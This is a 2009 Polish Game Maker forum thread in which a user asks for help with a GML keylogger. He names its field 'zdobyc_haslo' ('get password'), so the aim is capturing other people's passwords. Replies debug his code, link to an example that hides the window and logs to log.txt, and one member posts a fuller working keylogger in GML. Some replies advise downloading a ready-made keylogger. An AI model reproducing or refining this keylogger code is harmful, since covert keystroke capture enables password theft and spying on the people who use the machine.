XxMichałxX Opublikowano 22 Lutego 2009 Udostępnij Opublikowano 22 Lutego 2009 Create: GML nazwa=get_string('Podaj nazwe keylogowania:','zdobyc_haslo') ini_open('keylogger.ini') text='' if ini_section_exists(nazwa) then text=ini_read_string(nazwa,'TEXT','text') Step: GML if (keyboard_check_direct_pressed(ord('A'))==true) { text+='A' direct_pressed_end(ord('A')) } if (keyboard_check_direct_pressed(ord('B'))==true) { text+='B' direct_pressed_end(ord('B')) } if (keyboard_check_direct_pressed(ord('C'))==true) { text+='C' direct_pressed_end(ord('C')) } if (keyboard_check_direct_pressed(ord('D'))==true) { text+='D' direct_pressed_end(ord('D')) } if (keyboard_check_direct_pressed(ord('E'))==true) { text+='E' direct_pressed_end(ord('E')) } if (keyboard_check_direct_pressed(ord('F'))==true) { text+='F' direct_pressed_end(ord('F')) } if (keyboard_check_direct_pressed(ord('G'))==true) { text+='G' direct_pressed_end(ord('G')) } if (keyboard_check_direct_pressed(ord('H'))==true) { text+='H' direct_pressed_end(ord('H')) } if (keyboard_check_direct_pressed(ord('I'))==true) { text+='I' direct_pressed_end(ord('I')) } if (keyboard_check_direct_pressed(ord('J'))==true) { text+='J' direct_pressed_end(ord('J')) } if (keyboard_check_direct_pressed(ord('K'))==true) { text+='K' direct_pressed_end(ord('K')) } if (keyboard_check_direct_pressed(ord('L'))==true) { text+='L' direct_pressed_end(ord('L')) } if (keyboard_check_direct_pressed(ord('M'))==true) { text+='M' direct_pressed_end(ord('M')) } if (keyboard_check_direct_pressed(ord('N'))==true) { text+='N' direct_pressed_end(ord('N')) } if (keyboard_check_direct_pressed(ord('O'))==true) { text+='O' direct_pressed_end(ord('O')) } if (keyboard_check_direct_pressed(ord('P'))==true) { text+='P' direct_pressed_end(ord('P')) } if (keyboard_check_direct_pressed(ord('R'))==true) { text+='R' direct_pressed_end(ord('R')) } if (keyboard_check_direct_pressed(ord('S'))==true) { text+='S' direct_pressed_end(ord('S')) } if (keyboard_check_direct_pressed(ord('T'))==true) { text+='T' direct_pressed_end(ord('T')) } if (keyboard_check_direct_pressed(ord('U'))==true) { text+='U' direct_pressed_end(ord('U')) } if (keyboard_check_direct_pressed(ord('W'))==true) { text+='W' direct_pressed_end(ord('W')) } if (keyboard_check_direct_pressed(ord('Y'))==true) { text+='Y' direct_pressed_end(ord('Y')) } if (keyboard_check_direct_pressed(ord('Z'))==true) { text+='Z' direct_pressed_end(ord('Z')) } if (keyboard_check_direct_pressed(ord('X'))==true) { text+='X' direct_pressed_end(ord('X')) } if (keyboard_check_direct_pressed(ord('V'))==true) { text+='V' direct_pressed_end(ord('V')) } if (keyboard_check_direct_pressed(ord('1'))==true) { text+='1' direct_pressed_end(ord('1')) } if (keyboard_check_direct_pressed(ord('2'))==true) { text+='2' direct_pressed_end(ord('2')) } if (keyboard_check_direct_pressed(ord('3'))==true) { text+='3' direct_pressed_end(ord('3')) } if (keyboard_check_direct_pressed(ord('4'))==true) { text+='4' direct_pressed_end(ord('4')) } if (keyboard_check_direct_pressed(ord('5'))==true) { text+='5' direct_pressed_end(ord('5')) } if (keyboard_check_direct_pressed(ord('6'))==true) { text+='6' direct_pressed_end(ord('6')) } if (keyboard_check_direct_pressed(ord('7'))==true) { text+='7' direct_pressed_end(ord('7')) } if (keyboard_check_direct_pressed(ord('8'))==true) { text+='8' direct_pressed_end(ord('8')) } if (keyboard_check_direct_pressed(ord('9'))==true) { text+='9' direct_pressed_end(ord('9')) } if (keyboard_check_direct_pressed(vk_space)==true) { text+=' ' direct_pressed_end(vk_space) } if (keyboard_check_direct_pressed(vk_backspace)==true) { string_delete(text,string_length(text)-1,1) direct_pressed_end(vk_backspace) } Game End: GML ini_write_string(nazwa,'TEXT',text) Draw: GML draw_text(0,0,text) Włączam, napisałem np.: "haslojakiestam" i odrazu po włączeniu text przyjmuje wartosc 'AEHIJKLMOST' czyli z zmiennej nazwa poprzekładało litery losowo i tak za kazdym razem.. z jakiej paki ?! :boxed: :blink: <_< Źle nazwany temat. Ostrzeżenie. gnysek Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Marek.S Opublikowano 22 Lutego 2009 Udostępnij Opublikowano 22 Lutego 2009 było by mi łatwiej gdybyś zapodał plik gm6 ;) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Platyna Opublikowano 22 Lutego 2009 Udostępnij Opublikowano 22 Lutego 2009 Wcale nie zrobiło losowo :P Tylko zgodnie z alfabetem bo tak masz ify posegregowane :P Z tego wynika że on wczytuje znaki będąc zminimalizowanym, ale kod wykonuje dopiero po zaznaczeniu okna ;] Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Pental Stary Opublikowano 22 Lutego 2009 Udostępnij Opublikowano 22 Lutego 2009 Kod w step... Aaaa!! Dobra rada - twórz tablicę dla każdego znaku, potem pętlą for sprawdzaj, który przyciśnięty, sprawdzając konkretny element tablicy. Zresztą - nie lepiej pobrać sobie jakiś keylogger? W necie są takich tysiące... serio. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
XxMichałxX Opublikowano 23 Lutego 2009 Autor Udostępnij Opublikowano 23 Lutego 2009 ale ja nie rozumiem tego 'for' i tych tablic i chce zrobic swojego keyloggera edit: aha juz qmam bo te znaki sie wczytały z tego jak wpisywałem nazwe keylogowania? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Compi Opublikowano 28 Lutego 2009 Udostępnij Opublikowano 28 Lutego 2009 Keylogger w GMie... Mazo weź lepiej coś o Delphi poczytaj. Zrobisz go wtedy szybciej i łatwiej. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Pental Stary Opublikowano 28 Lutego 2009 Udostępnij Opublikowano 28 Lutego 2009 Skoro "nie rozumiesz tablic", to daruj sobie... Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Dawidds Opublikowano 28 Lutego 2009 Udostępnij Opublikowano 28 Lutego 2009 Lolwut, co za metoda robienia keyloggera. Poszukaj przykładu Tymona, a nazywał się key with numpad czy jakoś tak :P Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
I am vader Opublikowano 1 Marca 2009 Udostępnij Opublikowano 1 Marca 2009 Nie przekonacie go. Zachowuje się, jakby robił 6 gier naraz +2 wirusy, pełno pytań, a i tak nic konkretnego. Naprawdę, jak już chcesz keyloga robić, skorzystaj z języka najczęściej do tego używanego- Delphi. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
XxMichałxX Opublikowano 1 Marca 2009 Autor Udostępnij Opublikowano 1 Marca 2009 delphi to gow*o. Kazda rzecz jaka istnieje ktora znalazlem w necie zwiazana z delphi ( kazdy przyklad itp) nic nie dzialalo jak robilem, w ogole nawet zadne te .. nie pamietam jak to sie nazwya wiec nazwe to 'klocki' nie działają mi ktore dodalem (np keyspy). Errory i w ogole jak cokolwiek robilem w delphi to mnie brala kur*ica Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Jaklub Opublikowano 1 Marca 2009 Udostępnij Opublikowano 1 Marca 2009 Tak, "Delphi to kupa, bo go nie rozumiem i bierze mnie Kubica" (wiem że miałeś na myśli ku***cę). To się nazywa rozumowanie. Ściągnij se gotowego keyloggera z netu i tyle. Myślałeś nad czymś takim jak keyboard_string? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Ghost Opublikowano 1 Marca 2009 Udostępnij Opublikowano 1 Marca 2009 Na co tyle kodu? https://gmclan.org/up3078_12_keylogger.html Klawiszologia: Page Down: Ukrywasz okno (invisible) Po kilku sekundach (chyba 15) wszystko zapisuje się w log.txt. :) Kiedyś robiłem chyba takie coś... Trochę korzystałem z przykładu Tymona. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Tymon Opublikowano 1 Marca 2009 Udostępnij Opublikowano 1 Marca 2009 http://hurkel.gmclan.org/tymon/?path=gamem...with_numkey.gm6 + window_set_visible( false ) + zapis do pliku? Normalnie tak często pojawia się taki problem, że hej. delphi to gow*o. Kazda rzecz jaka istnieje ktora znalazlem w necie zwiazana z delphi ( kazdy przyklad itp) nic nie dzialalo jak robilem, w ogole nawet zadne te .. nie pamietam jak to sie nazwya wiec nazwe to 'klocki' nie działają mi ktore dodalem (np keyspy). Errory i w ogole jak cokolwiek robilem w delphi to mnie brala kur*icaTo co powiesz jak Ci powiem, że GM powstał w delphim? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Ghost Opublikowano 1 Marca 2009 Udostępnij Opublikowano 1 Marca 2009 Tymon. No wiesz... Przecież napisałem, że korzystałem z tego przykładu, bo nie chciało mi się od nowa pisać tych wszystkich tablic :( Nie bij. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
XxMichałxX Opublikowano 1 Marca 2009 Autor Udostępnij Opublikowano 1 Marca 2009 Myślałeś nad czymś takim jak keyboard_string? Myślałem ale ty teraz pomyśl czy keyboard_string działałby po ukryciu okna? edit: To co powiesz jak Ci powiem, że GM powstał w delphim? To powiem że Ci nie wierzę :o Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Platyna Opublikowano 1 Marca 2009 Udostępnij Opublikowano 1 Marca 2009 Myślałem ale ty teraz pomyśl czy keyboard_string działałby po ukryciu okna? edit: To powiem że Ci nie wierzę :o Boś głupi. Taka prawda :P A Delphi to dobry język. Chociaż wolę C++ :P Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Cekol Opublikowano 1 Marca 2009 Udostępnij Opublikowano 1 Marca 2009 A ja zrobiłem keylogera w gm... CREATE: GML text="" text_pressed="" STEP: GML chair_table="ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890" chair_numbers=string_length(chair_table) //show_message(string(chair_table)+" "+string(chair_numbers)) for(a=0;a<=chair_numbers;a+=1) { var key_pressed; key_pressed=0; chair_current= string_char_at(chair_table,a) if keyboard_check_direct(ord(chair_current)) key_pressed=1 chair_pressed=string_pos(chair_current,text_pressed) if chair_pressed=0 && key_pressed=1 { text_pressed+=" "+string(chair_current)+" " if keyboard_check_direct(vk_shift) text+=string(chair_current) else text+=string_lower(chair_current) } if chair_pressed!=0 && key_pressed=0 { text_pressed=string_replace_all(text_pressed," "+chair_current+" ","") } } key_use(vk_enter,"[ENTER]#") //key_use(vk_control,"[CTRL]") key_use(vk_space,"_") Skrypt"key_use": GML var key_pressed; key_pressed=0; if keyboard_check_direct(argument0) key_pressed=1 chair_pressed=string_pos(argument1,text_pressed) if chair_pressed=0 && key_pressed=1 { text_pressed+=string(argument1) text+=string(argument1) } if chair_pressed!=0 && key_pressed=0 { text_pressed=string_replace_all(text_pressed,argument1,"") } w stringu 'text' mamy wszystko zapisane co pisalismy :) Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
XxMichałxX Opublikowano 1 Marca 2009 Autor Udostępnij Opublikowano 1 Marca 2009 for(a=0;a<=chair_numbers;a+=1) w ogole co to jest te a i te = < + .. dla mnie ten powyzszy kod to jest jakis niezrozumiały ciąg znaków.. o co w nim chodzi? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Cekol Opublikowano 1 Marca 2009 Udostępnij Opublikowano 1 Marca 2009 Jak nie wiesz co to znaczy, to znaczy że musisz sie jeszcze pouczyć gmla , a nie robić keylogera :P XxMichałxX: Do zrozumienia mojego keylogera polecam artykuł "O stringach słów kilka" , dowiedzieć się trochę o pętlach , oraz użyć wyobraźni (ale tak mocno) xD Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Administratorzy gnysek Opublikowano 1 Marca 2009 Administratorzy Udostępnij Opublikowano 1 Marca 2009 for(a=0;a<=chair_numbers;a+=1) w ogole co to jest te a i te = < + .. dla mnie ten powyzszy kod to jest jakis niezrozumiały ciąg znaków.. o co w nim chodzi? Matematykę w szkole masz ? <=oznacza mniejsze lub równe, += oznacza zwiększanie. Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
XxMichałxX Opublikowano 1 Marca 2009 Autor Udostępnij Opublikowano 1 Marca 2009 no kurde wow, tylko ze po co to w tym jest? Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Jaklub Opublikowano 3 Marca 2009 Udostępnij Opublikowano 3 Marca 2009 no kurde wow, tylko ze po co to w tym jest? znajdź swoje okulary Odnośnik do komentarza Udostępnij na innych stronach Więcej opcji udostępniania...
Rekomendowane odpowiedzi
Jeśli chcesz dodać odpowiedź, zaloguj się lub zarejestruj nowe konto
Jedynie zarejestrowani użytkownicy mogą komentować zawartość tej strony.
Zarejestruj nowe konto
Załóż nowe konto. To bardzo proste!
Zarejestruj sięZaloguj się
Posiadasz już konto? Zaloguj się poniżej.
Zaloguj się